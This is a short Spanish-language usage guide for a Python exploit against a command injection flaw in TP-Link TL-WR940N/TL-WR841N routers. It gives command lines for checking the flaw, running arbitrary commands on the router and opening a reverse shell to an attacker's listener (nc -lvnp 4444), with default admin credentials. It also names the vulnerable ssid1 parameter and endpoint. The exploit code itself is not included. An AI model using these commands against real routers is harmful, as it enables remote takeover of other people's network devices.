
Exploit en Python para la vulnerabilidad de inyección de comandos de TP-Link TL-WR940N/TL-WR841N
Verificación Básica de Vulnerabilidad:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin
Ejecutar Comando Personalizado:
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin -c "your_command_here"
Shell Inversa (configure el listener primero con nc -lvnp 4444):
python tplink_exploit.py -t 192.168.1.1 -u admin -p admin --lhost YOUR_IP --lport 4444
Notas Importantes:
La vulnerabilidad existe debido a una sanitización incorrecta de la entrada en el parámetro ssid1 del endpoint /userRpm/WlanNetworkRpm.htm, lo que permite la inyección de comandos a través de solicitudes especialmente diseñadas.